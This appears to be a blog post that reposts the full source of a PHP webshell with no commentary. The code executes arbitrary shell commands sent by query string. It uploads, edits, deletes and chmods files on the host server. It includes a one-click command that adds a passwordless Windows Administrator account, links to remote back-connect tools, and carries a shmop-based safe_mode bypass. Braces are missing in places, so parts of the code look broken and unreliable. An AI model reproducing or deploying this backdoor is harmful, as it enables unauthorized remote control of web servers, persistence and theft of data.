php webshell code

最新推荐文章于 2022-10-21 11:19:27 发布

ask_man

最新推荐文章于 2022-10-21 11:19:27 发布

阅读量424

点赞数

分类专栏： code

code 专栏收录该内容

2 篇文章 0 订阅

订阅专栏

<head>

A:link {text-decoration:none}

A:visited {text-decoration:none}

A:hover {text-decoration:underline}

A:active {text-decoration:underline}

</style>

</head>

<?php

@set_time_limit(0);

$string = $_SERVER['QUERY_STRING'];

$mhost = 'http://www.Vel0zBR.xpg.com.br/Owner?';

$host_all = explode("$mhost", $string);

$s1 = $host_all[0];

$fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost;

$OS = @PHP_OS;

$IpServer = '127.0.0.1';

$UNAME = @php_uname();

$PHPv = @phpversion();

$SafeMode = @ini_get('safe_mode');

if ($SafeMode == '') { $SafeMode = "OFF"; }

else { $SafeMode = "$SafeMode"; }

$btname = 'backtool.txt';

$bt = 'http://www.expcode.com/exp/r0nin.expcode';

$dc = 'http://www.expcode.com/exp/dc.pl';

$newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup "Administrators" /add Admin;net localgroup "Users" /del Admin';

// Java Script

echo "<script type=\"text/javascript\">";

echo "function ChMod(chdir, file) {";

echo "var o = prompt('Chmod: - Exemple: 0777', '');";

echo "if (o) {";

echo "window.location=\"\" + '{$fstring}&action=chmod&chdir=' + chdir + '&file=' + file + '&chmod=' + o + \"\";";

echo "}";

echo "function Rename(chdir, file, mode) {";

echo "if (mode == 'edit') {";

echo "var o = prompt('Rename file '+ file + ' for:', '');";

echo "}";

echo "else {";

echo "var o = prompt('Rename dir '+ file + ' for:', '');";

echo "}";

echo "if (o) {";

echo "window.location=\"\" + '{$fstring}&action=rename&chdir=' + chdir + '&file=' + file + '&newname=' + o + '&mode=' + mode +\"\";";

echo "}";

echo "function Copy(chdir, file) {";

echo "var o = prompt('Copied for:', '/tmp/' + file);";

echo "if (o) {";

echo "window.location=\"\" + '{$fstring}&action=copy&chdir=' + chdir + '&file=' + file + '&fcopy=' + o + \"\";";

echo "}";

echo "function Mkdir(chdir) {";

echo "var o = prompt('Which name?', 'NewDir');";

echo "if (o) {";

echo "window.location=\"\" + '{$fstring}&action=mkdir&chdir=' + chdir + '&newdir=' + o + \"\";";

echo "}";

echo "function Newfile(chdir) {";

echo "var o = prompt('Which name?', 'NewFile.txt');";

echo "if (o) {";

echo "window.location=\"\" + '{$fstring}&action=newfile&chdir=' + chdir + '&newfile=' + o + \"\";";

echo "}";

echo "</script>";

// End JavaScript

/* Functions */

function cmd($CMDs) {

$CMD[1] = '';

exec($CMDs, $CMD[1]);

if (empty($CMD[1])) {

$CMD[1] = shell_exec($CMDs);

}

elseif (empty($CMD[1])) {

$CMD[1] = passthru($CMDs);

}

elseif (empty($CMD[1])) {

$CMD[1] = system($CMDs);

}

elseif (empty($CMD[1])) {

$handle = popen($CMDs, 'r');

while(!feof($handle)) {

$CMD[1][] .= fgets($handle);

}

pclose($handle);

}

return $CMD[1];

}

if (@$_GET['chdir']) {

$chdir = $_GET['chdir'];

} else {

$chdir = getcwd()."/";

}

if (@chdir("$chdir")) {

$msg = "Entrance in the directory, OK!";

} else {

$msg = "Error to enters it in the directory!";

$chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);

}

$chdir = str_replace(chr(92), chr(47), $chdir);

if (@$_GET['action'] == 'upload') {

$uploaddir = $chdir;

$uploadfile = $uploaddir. $_FILES['userfile']['name'];

if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $_FILES['userfile']['name'])) {

$msg = "{$_FILES['userfile']['name']}, the archive is validates and was loaded successfully.";

} else {

$msg = "Error when copying archive.";

}

elseif (@$_GET['action'] == 'mkdir') {

$newdir = $_GET['newdir'];

if (@mkdir("$chdir"."$newdir")) {

$msg = "{$newdir}, directory created successfully.";

} else {

$msg = "Error to it creates directory.";

}

elseif (@$_GET['action'] == 'newfile') {

$newfile = $_GET['newfile'];

if (@touch("$chdir"."$newfile")) {

$msg = "{$newfile}, created successfully!";

} else {

$msg = "Error to tries it creates archive.";

}

elseif (@$_GET['action'] == 'del') {

$file = $_GET['file']; $type = $_GET['type'];

if ($type == 'file') {

if (@unlink("$chdir"."$file")) {

$msg = "{$file}, successfully excluded archive!";

} else {

$msg = "Error to it I excluded archive!";

}

} elseif ($type == 'dir') {

if (@rmdir("$chdir"."$file")) {

$msg = "{$file}, successfully excluded directory!";

} else {

$msg = "Error to it I excluded directory!";

}

elseif (@$_GET['action'] == 'chmod') {

$file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];

if (@chmod ("$file", $chmod)) {

$msg = "Chmod of {$_GET['file']} moved for $chmod successfully.";

} else {

$msg = 'Error when moving chmod.';

}

elseif (@$_GET['action'] == 'rename') {

$file = $_GET['file']; $newname = $_GET['newname'];

if (@rename("$chdir"."$file", "$chdir"."$newname")) {

$msg = "Archive {$file} named for {$newname} successfully!";

} else {

$msg = "Error to it nominates archive.";

}

elseif (@$_GET['action'] == 'copy') {

$file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];

if (@copy("$file", "$copy")) {

$msg = "{$file}, copied for {$copy} successfully!";

} else {

$msg = "Error when copying {$file} for {$copy}";

}

/* Parte Atualiza 02:48 12/2/2006 */

elseif (@$_GET['action'] == 'cmd') {

if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }

if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }

$cmd = stripslashes(trim($cmd));

$result_arr = cmd($cmd);

$afim = count($result_arr); $acom = 0; $msg = '';

$msg .= "Results: ".$cmd."";

if ($result_arr) {

while ($acom <= $afim) {

$msg .= " ".@$result_arr[$acom]."";

$acom++;

}

else {

$msg .= "Erro ao executar comando.";

}

elseif (@$_GET['action'] == 'safemode') {

if (@!extension_loaded('shmop')) {

echo "Loading... module";

if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) {

@dl('php_shmop.dll');

} else {

@dl('shmop.so');

}

if (@extension_loaded('shmop')) {

echo "Module: shmop loaded!";

$shm_id = @shmop_open(0xff2, "c", 0644, 100);

if (!$shm_id) { echo "Couldn't create shared memory segment\n"; }

$data="\x00";

$offset=-3842685;

$shm_bytes_written = @shmop_write($shm_id, $data, $offset);

if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of data\n"; }

if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; }

echo passthru("id");

shmop_close($shm_id);

} else { echo "Module: shmop not loaded!"; }

}

elseif (@$_GET['action'] == 'zipen') {

$file = $_GET['file'];

$zip = @zip_open("$chdir"."$file");

$msg = '';

if ($zip) {

while ($zip_entry = zip_read($zip)) {

$msg .= "Name: " . zip_entry_name($zip_entry) . "\n";

$msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) . "\n";

$msg .= "Compressed Size: " . zip_entry_compressedsize($zip_entry) . "\n";

$msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\n";

if (zip_entry_open($zip, $zip_entry, "r")) {

echo "File Contents:\n";

$buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));

echo "$buf\n";

zip_entry_close($zip_entry);

}

echo "\n";

}

zip_close($zip);

}

elseif (@$_GET['action'] == 'edit') {

$file = $_GET['file'];

$conteudo = '';

$filename = "$chdir"."$file";

$conteudo = @file_get_contents($filename);

$conteudo = htmlspecialchars($conteudo);

$back = $_SERVER['HTTP_REFERER'];

echo "Editing {$file} ...";

echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse\" width=\"100%\" id=\"editacao\">";

echo "<tr>";

echo "<td width=\"100%\">";

echo "<form method=\"POST\" action=\"{$fstring}&action=save&chdir={$chdir}&file={$file}\">";

echo "";

print "<textarea rows=\"18\" name=\"S1\" cols=\"89\" style=\"font-family: Verdana; font-size: 10pt; border: 1px solid #000000\">{$conteudo}</textarea>";

echo "";

echo "<input type=\"submit\" value=\"Save\" name=\"B2\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\"> ";

echo "<input type=\"button\" value=\"Closes Publisher\" Onclick=\"javascript:window.location='{$fstring}&chdir={$chdir}'\" name=\"B1\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\"> ";

echo "</form>";

echo "</td>";

echo "</tr>";

echo "</table>";

}

elseif (@$_GET['action'] == 'save') {

$filename = "$chdir".$_GET['file'];

$somecontent = $_POST['S1'];

$somecontent = stripslashes(trim($somecontent));

if (is_writable($filename)) {

@$handle = fopen ($filename, "w");

@$fw = fwrite($handle, $somecontent);

@fclose($handle);

if ($handle && $fw) {

$msg = "{$_GET['file']}, edited successfully!";

}

} else {

$msg = "{$_GET['file']}, cannot be written!";

}

// Informações

$cmdget = '';

if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }

if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }

$cmdget = htmlspecialchars($cmdget);

function asdads() {

$asdads = '';

if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; }

if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; }

if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; }

if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; }

if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; }

return $asdads;

}

echo "<form method=\"POST\" name=\"cmd\" action=\"{$fstring}&action=cmd&chdir=$chdir\">";

echo "<fieldset style=\"border: 1px solid #000000; padding: 2\">";

echo "<legend>Informações cmd ripped by corey</legend>";

echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse; font-family: Tahoma; font-size: 10px\" width=\"100%\">";

echo "<tr>";

echo "<td width=\"8%\">";

echo "Sistema: </td>";

echo "<td width=\"92%\"> {$OS}</td>";

echo "</tr>";

echo "<tr>";

echo "<td width=\"8%\">";

echo "Uname: </td>";

echo "<td width=\"92%\"> {$UNAME}</td>";

echo "</tr>";

echo "<tr>";

echo "<td width=\"8%\">";

echo "PHP: </td>";

echo "<td width=\"92%\"> {$PHPv}, safe mode: {$SafeMode}</td>";

echo "</tr>";

if (strtoupper(substr($OS, 0,3) != 'WIN')) {

$Methods = asdads();

if ($Methods == '') { $Methods = "???"; }

echo "<tr>";

echo "<td width=\"8%\">";

echo "Methods: </td>";

echo "<td width=\"92%\"> {$Methods}</td>";

echo "</tr>";

}

echo "<tr>";

echo "<td width=\"8%\">";

echo "Ip: </td>";

echo "<td width=\"92%\"> {$IpServer}</td>";

echo "</tr>";

echo "<tr>";

echo "<td width=\"8%\">";

echo "Command: </td>";

echo "<td width=\"92%\"> <input type=\"text\" size=\"70\" name=\"cmd\" value=\"{$cmdget}\" style=\"font-family: Tahoma; font-size: 10 px; border: 1px solid #000000\"> <input type=\"submit\" name=\"action\" value=\"Send\" style=\"font-family: Tahoma; font-size: 10 px; border: 1px solid #000000\"></td>";

echo "</tr>";

echo "</table>";

echo "</fieldset></form>";

// Dir

echo "<form method=\"POST\" action=\"{$fstring}&action=upload&chdir=$chdir\" enctype=\"multipart/form-data\">";

echo "<fieldset style=\"border: 1px solid #000000; padding: 2\">";

if (is_writable("$chdir")) {

if (strtoupper(substr($OS, 0,3) == 'WIN')) {

echo "<legend>Dir YES: {$chdir} - <a href=\"#[New Dir]\" οnclick=\"Mkdir('{$chdir}');\">[New Dir]</a> <a href=\"#[New File]\" οnclick=\"Newfile('{$chdir}')\">[New File]</a> <a href=\"{$fstring}&action=cmd&chdir={$chdir}&cmd=$newuser\">[Remote Access]</a></legend>";

} else {

echo "<legend>Dir YES: {$chdir} - <a href=\"#[New Dir]\" οnclick=\"Mkdir('{$chdir}');\">[New Dir]</a> <a href=\"#[New File]\" οnclick=\"Newfile('{$chdir}')\">[New File]</a> <a href=\"{$fstring}&action=backtool&chdir={$chdir}&write=yes\">[BackTool]</a></legend>";

}

else {

if (strtoupper(substr($OS, 0,3) == 'WIN')) {

echo "<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\" οnclick=\"Mkdir('{$chdir}');\">[New Dir]</a> <a href=\"#[New File]\" οnclick=\"Newfile('{$chdir}')\">[New File]</a> <a href=\"{$fstring}&action=cmd&chdir={$chdir}&cmd={$newuser}\">[Remote Access]</a></legend>";

} else {

echo "<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\" οnclick=\"Mkdir('{$chdir}');\">[New Dir]</a> <a href=\"#[New File]\" οnclick=\"Newfile('{$chdir}')\">[New File]</a> <a href=\"{$fstring}&action=backtool&chdir={$chdir}&write=no\">[BackTool]</a></legend>";

}

if (@!$handle = opendir("$chdir")) {

echo " I could not enters in the directory, <a href=\"{$fstring}\">click here!</a> for return to the original directory!";

}

else {

echo " <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse; font-family: Tahoma; font-size: 10px\" width=\"100%\">";

echo " <tr>";

echo " <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\"> Upload:";

echo " <input type=\"file\" name=\"userfile\" size=\"91\" style=\"font-family: Tahoma; font-size: 10px; border-style: solid; border-width: 1\">";

echo " <input type=\"submit\" value=\"Send\" name=\"B1\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\"></td>";

echo " </tr>";

echo " <tr>";

echo " <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\"> </td>";

echo " </tr>";

echo " <tr>";

echo " <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\">";

if (@!$msg) {

echo " Messages</td>";

} else {

echo " $msg</td>";

}

echo " </tr>";

echo " <tr>";

echo " <td width=\"100%\" colspan=\"4\"> </td>";

echo " </tr>";

echo " <tr>";

echo " <td width=\"9%\"> Perms</td>";

echo " <td width=\"49%\"> File </td>";

echo " <td width=\"10%\"> Size </td>";

echo " <td width=\"32%\"> Commands</td>";

echo " </tr>";

$colorn = 0;

while (false !== ($file = readdir($handle))) {

if ($file != '.') {

if ($colorn == 0) {

$color = "style=\"background-color: #FFCC66\"";

}

elseif ($colorn == 1) {

$color = "style=\"background-color: #C0C0C0\"";

}

if (@is_dir("$chdir"."$file")) {

$file = $file.'/';

$mode = 'chdir';

} else {

$mode = 'edit';

}

if (@substr("$chdir", strlen($chdir) -1, 1) != '/') {

$chdir .= '/';

}

if ($file == '../') {

$lenpath = strlen($chdir); $baras = 0;

for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } }

$chdir_ = explode("/", $chdir);

$chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir);

}

$perms = @fileperms ("$chdir"."$file");

if ($perms == '') {

$perms = '???';

}

$size = @filesize ("$chdir"."$file");

$size = $size / 1024;

$size = explode(".", $size);

if (@$size[1] != '') {

$size = $size[0].'.'.@substr("$size[1]", 0, 2);

} else {

$size = $size[0];

}

if ($size == 0) {

if ($mode == 'chdir') {

$size = '???';

}

echo "<tr>";

echo "<td width=\"9%\" $color> $perms</td>";

if (@is_writable ("$chdir"."$file")) {

if ($mode == 'chdir') {

if ($file == '../') {

echo "<td width=\"49%\" $color> <a href=\"{$fstring}&chdir=$chdirpox\">$file</a></td>";

} else {

echo "<td width=\"49%\" $color> <a href=\"{$fstring}&chdir={$chdir}{$file}\">$file</a></td>";

}

} else {

if (is_readable("$chdir"."$file")) {

echo "<td width=\"49%\" $color> <a href=\"{$fstring}&action=edit&chdir=$chdir&file=$file\">$file</a></td>";

} else {

echo "<td width=\"49%\" $color> $file</td>";

}

else {

if ($mode == 'chdir') {

if ($file == '../') {

echo "<td width=\"49%\" $color> <a href=\"{$fstring}&chdir=$chdirpox\">$file</a></td>";

} else {

echo "<td width=\"49%\" $color> <a href=\"{$fstring}&chdir={$chdir}{$file}\">$file</a></td>";

}

} else {

if (@is_readable("$chdir"."$file")) {

echo "<td width=\"49%\" $color> <a href=\"{$fstring}&action=edit&chdir=$chdir&file=$file\">$file</a></td>";

} else {

echo "<td width=\"49%\" $color> $file</td>";

}

echo "<td width=\"10%\" $color> $size KB</td>";

if ($mode == 'edit') {

echo "<td width=\"32%\" $color> <a href=\"#{$file}\" οnclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">[Rename]</a> <a href=\"{$fstring}&action=del&chdir={$chdir}&file={$file}&type=file\">[Del]</a> <a href=\"#{$file}\" οnclick=\"ChMod('$chdir', '$file')\">[Chmod]</a> <a href=\"#{$file}\" οnclick=\"Copy('{$chdir}', '{$file}')\">[Copy]</a></td>";

} else {

echo "<td width=\"32%\" $color> <a href=\"#{$file}\" οnclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">[Rename]</a> <a href=\"{$fstring}&action=del&chdir={$chdir}&file={$file}&type=dir\">[Del]</a> <a href=\"#{$file}\" οnclick=\"ChMod('$chdir', '$file')\">[Chmod]</a> [Copy]</td>";

}

echo "</tr>";

if ($colorn == 0) {

$colorn = 1;

}

elseif ($colorn == 1) {

$colorn = 0;

}

closedir($handle);

}

</table>

</fieldset></form>